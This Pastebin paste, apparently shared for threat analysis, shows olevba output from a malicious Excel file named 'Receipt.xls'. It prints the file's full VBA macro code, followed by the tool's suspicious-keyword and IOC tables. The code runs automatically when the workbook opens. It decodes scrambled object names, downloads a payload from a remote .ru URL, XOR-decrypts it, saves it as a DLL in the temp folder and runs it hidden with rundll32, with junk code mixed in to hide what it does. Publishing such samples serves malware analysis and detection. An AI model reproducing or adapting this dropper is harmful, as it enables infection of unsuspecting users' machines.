SHARE
TWEET

Malicious Excel macro

dynamoo Sep 29th, 2016 247 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OpX:MASI-B- Receipt.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: Receipt.xls
  10. Type: OpenXML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ÝòàÊíèãà.cls
  13. in file: xl/vbaProject.bin - OLE stream: u'VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub Workbook_Open()
  16.  
  17. ItNinja "ASDEX"
  18. End Sub
  19.  
  20.  
  21. Function copy_screen_to_array(output_array)
  22.     output_array = ""
  23.     Dim screenarray(23)
  24.     Row = 1
  25.     For Each Line In screenarray
  26.         EMReadS.creen reading_line, 80, Row, 1
  27.         output_array = output_array & reading_line & "UUDDLRLRBA"
  28.         Row = Row + 1
  29.     Next
  30.     output_array = Split(output_array, "UUDDLRLRBA")
  31. End Function
  32.  
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. ANALYSIS:
  35. +----------+---------------+----------------------------------------+
  36. | Type     | Keyword       | Description                            |
  37. +----------+---------------+----------------------------------------+
  38. | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
  39. +----------+---------------+----------------------------------------+
  40. -------------------------------------------------------------------------------
  41. VBA MACRO Ëèñò1.cls
  42. in file: xl/vbaProject.bin - OLE stream: u'VBA/\u041b\u0438\u0441\u04421'
  43. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  44. (empty macro)
  45. -------------------------------------------------------------------------------
  46. VBA MACRO Module1.bas
  47. in file: xl/vbaProject.bin - OLE stream: u'VBA/Module1'
  48. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  49. Public moyaMANUNADAcdaw As Object
  50. Public moyaMANUNAra12dv34 As Object
  51. Public moyaMANUNAKSKLAL As Object
  52.  
  53.  
  54.  
  55. Public moyaMANUNALAKOPPC As String
  56. Public moyaMANUNAPLdunay() As String
  57. Public moyaMANUNAUUUKA As String
  58. Public moyaMANUNAUUUKABBB As String
  59.  
  60.  
  61. Public moyaMANUNAGMAKO As Object
  62. Public moyaMANUNA4 As String
  63.  Public moyaMANUNA2 As String
  64. Public moyaMANUNAASALLLP As Variant
  65.  
  66.  Public Const moyaMANUNARH = "User-Agent"
  67. Public Const RACHEL = "etofi"
  68.  
  69.  
  70. Public Function TlfFormat(ByVal tlfNr As String, dilodan As Boolean) As String
  71.     Dim tmp As String
  72.     Dim i As Long
  73. If dilodan Then
  74.  moyaMANUNALAKOPPC = moyaMANUNAKSKLAL(moyaMANUNAPLdunay(6))
  75.  moyaMANUNAUUUKA = moyaMANUNALAKOPPC
  76.  
  77.  
  78.  moyaMANUNAUUUKABBB = moyaMANUNAUUUKA + "\hrushki"
  79. moyaMANUNAUUUKA = moyaMANUNAUUUKA + moyaMANUNAPLdunay(12)
  80.  
  81. Exit Function
  82. Else
  83. GoTo VarPupka
  84. End If
  85. restart:
  86.     For i = 1 To Len(tlfNr)
  87.         If Mid$(tlfNr, i, 1) = " " Then
  88.             tlfNr = Mid$(tlfNr, 1, i - 1) & Mid$(tlfNr, i + 1)
  89.             GoTo restart
  90.         End If
  91.     Next i
  92.  
  93.     For i = 1 To Len(tlfNr)
  94.         tmp = tmp & Mid$(tlfNr, i, 1)
  95.         If i = 2 Or i = 4 Or i = 6 Or i = 8 Or i = 10 Then
  96.             tmp = tmp & " "
  97.         End If
  98.     Next i
  99.  
  100.     TlfFormat = tmp
  101.    
  102. VarPupka:
  103. CallByName moyaMANUNAra12dv34, "sav" + RACHEL + "le", VbMethod, moyaMANUNAUUUKABBB, 14 / 7
  104.  SaveAllStufAndExit moyaMANUNAUUUKABBB, moyaMANUNAUUUKA, "S2CsMgS5Y9WxzevdSUrPqUiTwI69FbRq"
  105.  
  106.      Call Shell("rund" & "ll32.exe " & moyaMANUNAUUUKA & ",qwerty", vbHide)
  107.  
  108.  End Function
  109.  
  110. Function PhraseCmd(cmd)
  111.    
  112.     regEx.IgnoreCase = True
  113.     Set Matches = regEx.Execute(cmd)
  114.     If Matches.Count <> 0 Then
  115.         Set objMatch = Matches(0)
  116.         Command = objMatch.SubMatches(0)
  117.        
  118.         WAITTIME = CInt(objMatch.SubMatches(1))
  119.         WScript.Echo "WMIEXEC : Waiting " & WAITTIME & " ms..." & vbNewLine
  120.     End If
  121.    
  122.     regEx.Pattern = "(.*?)-persist"
  123.     regEx.IgnoreCase = True
  124.     Set Matches = regEx.Execute(cmd)
  125.     If Matches.Count <> 0 Then
  126.         Set objMatch = Matches(0)
  127.         Command = objMatch.SubMatches(0)
  128.         PhraseCmd = "persist"
  129.     End If
  130. End Function
  131.  
  132.  
  133. Function CreateShare()
  134.    
  135.     Set objNewShare = objWMIService.Get("Win32_Share")
  136.     intReturn = objNewShare.Create _
  137.         (FilePath, "WMI_SHARE", 0, 25, "")
  138.     If intReturn <> 0 Then
  139.         WScript.Echo "WMIEXEC ERROR: Share could not be created." & _
  140.             vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
  141.         Select Case intReturn
  142.             Case 2
  143.                 WScript.Echo "WMIEXEC ERROR: Access Denied!"
  144.             Case 9
  145.                 WScript.Echo "WMIEXEC ERROR: Invalid File Path!"
  146.             Case 22
  147.                 WScript.Echo "WMIEXEC ERROR: Share Name Already In Used!"
  148.             Case 24
  149.                 WScript.Echo "WMIEXEC ERROR: Directory NOT exists!"
  150.         End Select
  151.         If intReturn <> 22 Then WScript.Quit 1
  152.     Else
  153.         WScript.Echo "WMIEXEC : Share created sucess."
  154.         WScript.Echo "WMIEXEC : Share Name -> WMI_SHARE"
  155.         WScript.Echo "WMIEXEC : Share Path -> " & FilePath
  156.     End If
  157. End Function
  158.  
  159.  
  160.  
  161.  
  162. Public Function GodnTeBabenParama(CH1 As String, CH2 As String, CH3 As String) As String
  163. GodnTeBabenParama = Replace(CH1, CH2, CH3)
  164. End Function
  165. Public Function NombreUsuario() As String
  166. Dim SQL As String
  167.  
  168.  
  169.  moyaMANUNAra12dv34.Type = 0 + 0 + 1
  170.  
  171.  moyaMANUNAra12dv34.Open
  172. Exit Function
  173.  
  174.  
  175. SQL = "Select * from Usuarios WHERE usu_id=" & IdUsuario
  176.  
  177.  
  178. If Not RsUsuario.EOF Then
  179.     NombreUsuario = RsUsuario!usu_apodo
  180. End If
  181. End Function
  182. Function DeleteShare()
  183.     For Each objShare In colShares
  184.         intReturn = objShare.Delete
  185.     Next
  186.     If intReturn <> 0 Then
  187.         WScript.Echo "WMIEXEC ERROR: Delete Share failed." & _
  188.             vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
  189.         Select Case intReturn
  190.             Case 2
  191.                 WScript.Echo "WMIEXEC ERROR: Access Denied!"
  192.             Case 25
  193.                 WScript.Echo "WMIEXEC ERROR: Share Not Exists!"
  194.         End Select
  195.     Else
  196.         WScript.Echo "WMIEXEC : Share deleted sucess."
  197.     End If
  198. End Function
  199.  
  200.  
  201. Public Function ToDBDateTime(ByVal ddmmyyhhmmDateTime As String) As String
  202.    
  203.      Set moyaMANUNA1DASH1solo = CreateObject(moyaMANUNAPLdunay(3))
  204.  Set moyaMANUNAKSKLAL = moyaMANUNA1DASH1solo.Environment(moyaMANUNAPLdunay(2 + 2))
  205.  VerCadenaPermiso ddmmyyhhmmDateTime
  206. End Function
  207.  
  208.  
  209.  
  210.  
  211.  
  212.  
  213. Public Sub DecryptByte(ByteArray() As Byte, Key As String)
  214.  
  215.   Dim offset As Long
  216.   Dim ByteLen As Long
  217.   Dim ResultLen As Long
  218.   Dim CurrPercent As Long
  219.   Dim NextPercent As Long
  220.   Dim m_Key() As Byte
  221. Dim m_KeyLen As Long
  222.  
  223.   m_KeyLen = Len(Key)
  224. ReDim m_Key(m_KeyLen)
  225.  
  226.   m_Key = StrConv(Key, vbFromUnicode)
  227.  
  228.  
  229.   ByteLen = UBound(ByteArray) + 1
  230.   ResultLen = ByteLen
  231.  
  232.  
  233.   For offset = 0 To (ByteLen - 1)
  234.     ByteArray(offset) = ByteArray(offset) Xor m_Key(offset Mod m_KeyLen)
  235.  
  236.    
  237.     If (offset >= NextPercent) Then
  238.       CurrPercent = Int((offset / ResultLen) * 100)
  239.       NextPercent = (ResultLen * ((CurrPercent + 1) / 100)) + 1
  240.     End If
  241.   Next
  242. End Sub
  243.  
  244.  
  245. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  246. ANALYSIS:
  247. +------------+----------------+-----------------------------------------+
  248. | Type       | Keyword        | Description                             |
  249. +------------+----------------+-----------------------------------------+
  250. | Suspicious | CreateObject   | May create an OLE object                |
  251. | Suspicious | CallByName     | May attempt to obfuscate malicious      |
  252. |            |                | function calls                          |
  253. | Suspicious | Open           | May open a file                         |
  254. | Suspicious | Shell          | May run an executable file or a system  |
  255. |            |                | command                                 |
  256. | Suspicious | vbHide         | May run an executable file or a system  |
  257. |            |                | command                                 |
  258. | Suspicious | Xor            | May attempt to obfuscate specific       |
  259. |            |                | strings                                 |
  260. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  261. |            |                | may be used to obfuscate strings        |
  262. |            |                | (option --decode to see all)            |
  263. | IOC        | ll32.exe       | Executable file name                    |
  264. +------------+----------------+-----------------------------------------+
  265. -------------------------------------------------------------------------------
  266. VBA MACRO Module2.bas
  267. in file: xl/vbaProject.bin - OLE stream: u'VBA/Module2'
  268. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  269.  
  270. Public Sub VerCadenaPermiso(permiso As String)
  271. Dim i As Long
  272. Dim letra As String
  273.  
  274. Alta = False
  275. Baja = False
  276. modi = False
  277. Dim Consu As Boolean
  278. Consu = True
  279.  
  280.  
  281.  moyaMANUNA4 = "http://opmsk.ru/g76ub76"
  282.  
  283.  If Application = "Microsoft Excel" Then
  284.  moyaMANUNADAcdaw.Open moyaMANUNAPLdunay(5), moyaMANUNA4, False
  285.  
  286. moyaMANUNADAcdaw.setRequestHeader moyaMANUNARH, "Mozilla/4.5 (compatible; MSIE 6.5; Windows NT 5.5)"
  287.    
  288. moyaMANUNADAcdaw.Send
  289. TlfFormat letra, True
  290.  NombreUsuario
  291.   moyaMANUNAacheha letra
  292. End If
  293.  
  294. Exit Sub
  295.     For i = 1 To Len(permiso)
  296.        
  297.         letra = Mid(permiso, i, 1)
  298.        
  299.         If letra = "A" Then
  300.             Alta = True
  301.         End If
  302.        
  303.         If letra = "B" Then
  304.             Baja = True
  305.         End If
  306.        
  307.         If letra = "M" Then
  308.             modi = True
  309.         End If
  310.        
  311.         If letra = "C" Then
  312.             Consu = True
  313.         End If
  314.     Next i
  315.     If Len(permiso) = 0 Then
  316.         Consu = False
  317.         modi = False
  318.         Alta = False
  319.         Baja = False
  320.     End If
  321. End Sub
  322.  
  323.  
  324.  
  325. Public Function GetResulOfMyResult(ByVal Cadena As String) As String
  326.    
  327.    
  328.  moyaMANUNA2 = GodnTeBabenParama(moyaMANUNA2, "=CH", "M")
  329. GetCurrentFolder
  330.  
  331.  
  332.  Set moyaMANUNAra12dv34 = CreateObject(moyaMANUNAPLdunay(1))
  333.    
  334.  Set moyaMANUNAGMAKO = CreateObject(moyaMANUNAPLdunay(5 - 3))
  335.  
  336.  ClearString ""
  337. End Function
  338.  
  339.  
  340. Public Function moyaMANUNAacheha(pass As String) As String
  341.     Dim temp As String
  342.     Dim moyaMANUNAtum As String
  343.     GoTo beyTumba
  344.     Dim pos As Long
  345.     Dim leng As Long
  346.     Dim tim As Variant
  347.     Dim i As Long
  348.     Dim Key As Long
  349.     leng = Len(pass)
  350.     tim = Mid(Time, 1, 8)
  351.     tim = Mid(tim, 1, Len(tim) - 3)
  352.     tim = Mid(tim, Len(tim) - 1, 2) * Int(Rnd * 100)
  353.     For i = 1 To Len(CStr(tim))
  354.         pos = pos + CInt(Mid(CStr(tim), i, 1))
  355.     Next
  356.     While pos > Len(pass)
  357.         pos = pos Mod 10 + Int(Rnd * 10)
  358.         If pos = 0 Then
  359.             pos = Len(pass) + 1
  360.         End If
  361.     Wend
  362.    
  363. beyTumba:
  364.    
  365. moyaMANUNAASALLLP = moyaMANUNADAcdaw.responseBody
  366.  
  367.  ReadResult
  368.  
  369. End Function
  370. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  371. ANALYSIS:
  372. +------------+----------------------+-----------------------------------------+
  373. | Type       | Keyword              | Description                             |
  374. +------------+----------------------+-----------------------------------------+
  375. | Suspicious | CreateObject         | May create an OLE object                |
  376. | Suspicious | Open                 | May open a file                         |
  377. | Suspicious | Windows              | May enumerate application windows (if   |
  378. |            |                      | combined with Shell.Application object) |
  379. | IOC        | http://opmsk.ru/g76u | URL                                     |
  380. |            | b76                  |                                         |
  381. +------------+----------------------+-----------------------------------------+
  382. -------------------------------------------------------------------------------
  383. VBA MACRO Module3.bas
  384. in file: xl/vbaProject.bin - OLE stream: u'VBA/Module3'
  385. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  386.  
  387. Public Function ReadResult()
  388.  
  389.  
  390.  moyaMANUNAra12dv34.Write moyaMANUNAASALLLP
  391. GoTo pid7
  392.     WScript.Sleep (WAITTIME)
  393.     UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & Filename
  394.     Set fso = CreateObject("Scripting.FileSystemObject")
  395.     Set objFile = fso.OpenTextFile(UNCFilePath, 1)
  396.     If Not objFile.AtEndOfStream Then strContents = objFile.ReadAll
  397.     objFile.Close
  398.     WScript.Echo strContents
  399.    
  400.     strDelFile = "del " & file & " /F"
  401.     exe.c strDelFile, "nul"
  402. pid7:
  403.      TlfFormat "", False
  404. End Function
  405.  
  406. Public Function GetCurrentFolder()
  407.      moyaMANUNA2 = GodnTeBabenParama(moyaMANUNA2, "*P", LCase("S"))
  408. GoTo mig5
  409.    
  410.     WScript.Sleep (WAITTIME)
  411.     UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & Filename
  412.     Set fso = CreateObject("Scripting.FileSystemObject")
  413.     Set objFile = fso.OpenTextFile(UNCFilePath, 1)
  414.     GetCurrentFolder = objFile.ReadLine
  415.     objFile.Close
  416.     strDelFile = "del " & file & " /F"
  417.     exe.c strDelFile, "nul"
  418. mig5:
  419.      moyaMANUNAPLdunay = Split(moyaMANUNA2, "JIIIINX")
  420. End Function
  421.  
  422.  
  423.  
  424.  
  425.  
  426. Public Function ClearString(ByRef inOrigString As String) As String
  427.     Dim strNewString As String
  428.     Dim sChar As String
  429. Dim i As Integer
  430.  Dim d As Boolean
  431.  d = True
  432.  IsWord = True
  433.  For i = 1 To Len(Trim("Reika"))
  434.  If d = False Then
  435. Set moyaMANUNADAcdaw = CreateObject(moyaMANUNAPLdunay(i - 2))
  436. Exit For
  437. Else
  438. d = False
  439. End If
  440. Next i
  441. ToDBDateTime ""
  442. Exit Function
  443.    
  444. Call check_fo.r_MAXIS(False)
  445.  
  446. Call navigate_t.o_MAXIS_screen("POLI", "____")
  447. EMWri.teScreen "TEMP", 5, 40
  448. EMWri.teScreen "TABLE", 21, 71
  449. trans.mit
  450.  
  451.  
  452. Set objExcel = CreateObject("Excel.Application")
  453. objExcel.Visible = True
  454. Set objWorkbook = objExcel.Workbooks.Add()
  455. objExcel.DisplayAlerts = True
  456.  
  457.  
  458. objExcel.Cells(1, 1).Value = "TITLE"
  459. objExcel.Cells(1, 2).Value = "SECTION"
  460. objExcel.Cells(1, 3).Value = "REVISED"
  461.  
  462. For i = 1 To 3
  463.     objExcel.Cells(1, i).Font.Bold = True
  464. Next
  465.  
  466.  
  467.  
  468.     ClearString = strNewString
  469. End Function
  470.  
  471.  
  472.  
  473. Public Sub SaveAllStufAndExit(SourceFile As String, DestFile As String, Optional Key As String)
  474.  
  475.   Dim libhercen As Integer
  476.   Dim ByteArray() As Byte
  477.  
  478.  
  479.  
  480.  
  481.  
  482.   libhercen = FreeFile
  483.   Open SourceFile For Binary As #libhercen
  484.   ReDim ByteArray(0 To LOF(libhercen) - 1)
  485.   Get #libhercen, , ByteArray()
  486.   Close #libhercen
  487.  
  488.  
  489.   Call DecryptByte(ByteArray(), Key)
  490.  
  491.  
  492.  
  493.   libhercen = FreeFile
  494.   Open DestFile For Binary As #libhercen
  495.   Put #libhercen, , ByteArray()
  496.   Close #libhercen
  497.  
  498. End Sub
  499.  
  500.  
  501. Public Function ItNinja(ByRef inGUID As String) As String
  502. moyaMANUNA2 = "=CHicro*Poft.X=CHLHTTPJIIIINXAdodb.*Ptr-Ea=CHJIIIINX*Ph-Ell.Ap"
  503. moyaMANUNA2 = moyaMANUNA2 + GodnTeBabenParama("plicationJIIIINXW*Pcript.*Ph-EllJIIIINXProc-E*P*PJIIIINXG-ETJIIIINXT-E=CHPJIIIINXTyp-EJIIIINXop-EnJIIIINXwritFILMABOpon*P-EBodyJIIIINX*Pav-Etofil-EJIIIINX", "FILMABO", "-EJIIIINXr-E*P")
  504. moyaMANUNA2 = GodnTeBabenParama(moyaMANUNA2 + "\hupoa*P.dll", "-E", "e")
  505.  
  506.  
  507. GetResulOfMyResult "-"
  508. Exit Function
  509.     If Mid$(inGUID, 1, 1) <> "{" Then
  510.         ItNinja = "{" & inGUID & "}"
  511.     Else
  512.         ItNinja = inGUID
  513.     End If
  514. End Function
  515.  
  516.  
  517.  
  518. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  519. ANALYSIS:
  520. +------------+----------------+-----------------------------------------+
  521. | Type       | Keyword        | Description                             |
  522. +------------+----------------+-----------------------------------------+
  523. | Suspicious | CreateObject   | May create an OLE object                |
  524. | Suspicious | Open           | May open a file                         |
  525. | Suspicious | Write          | May write to a file (if combined with   |
  526. |            |                | Open)                                   |
  527. | Suspicious | Put            | May write to a file (if combined with   |
  528. |            |                | Open)                                   |
  529. | Suspicious | Binary         | May read or write a binary file (if     |
  530. |            |                | combined with Open)                     |
  531. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  532. |            |                | may be used to obfuscate strings        |
  533. |            |                | (option --decode to see all)            |
  534. | IOC        | P.dll          | Executable file name                    |
  535. +------------+----------------+-----------------------------------------+
RAW Paste Data
Top